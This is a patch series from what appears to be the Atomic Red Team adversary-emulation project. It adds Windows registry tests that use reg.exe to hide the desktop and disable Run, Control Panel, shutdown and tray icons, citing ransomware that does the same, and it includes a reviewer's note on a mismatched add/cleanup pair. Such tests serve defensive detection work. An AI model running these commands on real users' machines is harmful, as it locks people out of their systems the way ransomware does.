@@ -230,7 +230,7 @@ atomic_tests: auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. - See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 + See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 supported_platforms: - windows executor: @@ -246,7 +246,7 @@ atomic_tests: auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. - See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah + See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah supported_platforms: - windows executor: @@ -260,7 +260,7 @@ atomic_tests: auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. - See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ + See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ supported_platforms: - windows executor: 
@@ -269,4 +269,214 @@ atomic_tests: cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1 name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true +- name: Activate Windows NoDesktop Group Policy Feature + auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoRun Group Policy Feature + auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f + name: command_prompt + elevation_required: true +- name: Activate Windows NoFind Group Policy Feature + auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoControlPanel Group Policy Feature + auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoFileMenu Group Policy Feature + auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoClose Group Policy Feature + auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoSetTaskbar Group Policy Feature + auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoTrayContextMenu Group Policy Feature + auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Activate Windows NoPropertiesMyDocuments Group Policy Feature + auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Hide Windows Clock Group Policy Feature + auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Windows HideSCAHealth Group Policy Feature + auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Windows HideSCANetwork Group Policy Feature + auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Windows HideSCAPower Group Policy Feature + auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Windows HideSCAVolume Group Policy Feature + auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. + Take note that some Group Policy changes might require a restart to take effect.. 
+ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1 + name: command_prompt + elevation_required: true From cbf89911c13413ef868c7f7c1bcfe0c78b84b70a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 16 Mar 2022 00:45:05 +0000 Subject: [PATCH 54/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 88d6f1b4..fb1c1628 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -913,3 +913,17 @@ b51239b4-0129-474f-a2b4-70f855b9f2c2 640cbf6d-659b-498b-ba53-f6dd1a1cc02c 5e09bed0-7d33-453b-9bf3-caea32bff719 c6c34f61-1c3e-40fb-8a58-d017d88286d8 +93386d41-525c-4a1b-8235-134a628dee17 +d49ff3cc-8168-4123-b5b3-f057d9abbd55 +ffbb407e-7f1d-4c95-b22e-548169db1fbd +a450e469-ba54-4de1-9deb-9023a6111690 +5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 +12f50e15-dbc6-478b-a801-a746e8ba1723 +d29b7faf-7355-4036-9ed3-719bd17951ed +4d72d4b1-fa7b-4374-b423-0fe326da49d2 +20fc9daa-bd48-4325-9aff-81b967a84b1d +8023db1e-ad06-4966-934b-b6a0ae52689e +a4637291-40b1-4a96-8c82-b28f1d73e54e +3e757ce7-eca0-411a-9583-1c33b8508d52 +8d85a5d8-702f-436f-bc78-fcd9119496fc +7f037590-b4c6-4f13-b3cc-e424c5ab8ade From 924cb2491c77ceb3a54ebcee4ac92b2b69370b52 Mon Sep 17 00:00:00 2001 
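Review bot: The NoTrayContextMenu test sets one value and cleans up another: its executor runs `reg add ... /v StartMenuLogOff /t REG_DWORD /d 1 /f` while its cleanup deletes `/v NoTrayContextMenu`, so the value actually written is never removed and the value named in the test title is never set; the add line should read `reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f`. The NoPropertiesMyDocuments add command is the only one without a trailing `/f`, so when the value already exists reg.exe prompts for overwrite confirmation and the non-interactive command_prompt executor stalls; append `/f` to match the other tests. Two smaller inconsistencies in the same hunk: the NoRun cleanup lacks the `>nul 2>&1` every other cleanup uses, and the HideSCAVolume description ends with a doubled period (`take effect..`).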
From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Mar 2022 00:45:11 +0000 Subject: [PATCH 55/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 14 + atomics/Indexes/Indexes-CSV/windows-index.csv | 14 + atomics/Indexes/Indexes-Markdown/index.md | 14 + .../Indexes/Indexes-Markdown/windows-index.md | 14 + atomics/Indexes/index.yaml | 278 +++++++++- atomics/T1112/T1112.md | 520 +++++++++++++++++- 6 files changed, 838 insertions(+), 16 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 440e572d..d9dd67a6 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -488,6 +488,20 @@ defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d113 defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt +defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt +defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt +defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt +defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt +defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt +defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt +defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt +defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt +defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt +defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt +defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group 
Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt +defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt +defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt +defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 7415432b..5878040a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -318,6 +318,20 @@ defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d113 defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt +defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt +defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt +defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt +defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt +defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt +defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt +defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt +defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt +defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt +defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt +defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group 
Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt +defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt +defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt +defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 85d3ea02..10082dba 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -763,6 +763,20 @@ - Atomic Test #14: Disable Windows LogOff Button [windows] - Atomic Test #15: Disable Windows Change Password Feature [windows] - Atomic Test #16: Disable Windows Lock Workstation Feature [windows] + - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows] + - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows] + - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows] + - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows] + - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows] + - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows] + - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows] + - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows] + - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows] + - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows] + - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows] + - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows] + - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows] + - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows] - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e93541ee..78c1737f 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -530,6 +530,20 @@ - Atomic Test #14: Disable Windows LogOff Button [windows] - Atomic Test #15: Disable Windows Change Password Feature [windows] - Atomic Test #16: Disable Windows Lock Workstation Feature [windows] + - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows] + - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows] + - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows] + - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows] + - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows] + - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows] + - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows] + - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows] + - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows] + - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows] + - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows] + - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows] + - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows] + - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows] - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f3b8af6a..6074038f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -31782,7 +31782,7 @@ defense-evasion: auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. - See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry supported_platforms: - windows executor: @@ -31800,7 +31800,7 @@ defense-evasion: auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application. - See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry supported_platforms: - windows executor: 
@@ -31818,7 +31818,7 @@ defense-evasion: auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. - See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry supported_platforms: - windows executor: @@ -31836,7 +31836,7 @@ defense-evasion: auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. - See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html + See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html supported_platforms: - windows executor: @@ -31854,7 +31854,7 @@ defense-evasion: auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. - See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ + See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ supported_platforms: - windows executor: 
@@ -31872,7 +31872,7 @@ defense-evasion: auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. - See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 + See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 supported_platforms: - windows executor: @@ -31888,7 +31888,7 @@ defense-evasion: auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. - See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah + See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah supported_platforms: - windows executor: @@ -31906,7 +31906,7 @@ defense-evasion: auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. - See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ + See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ supported_platforms: - windows executor: 
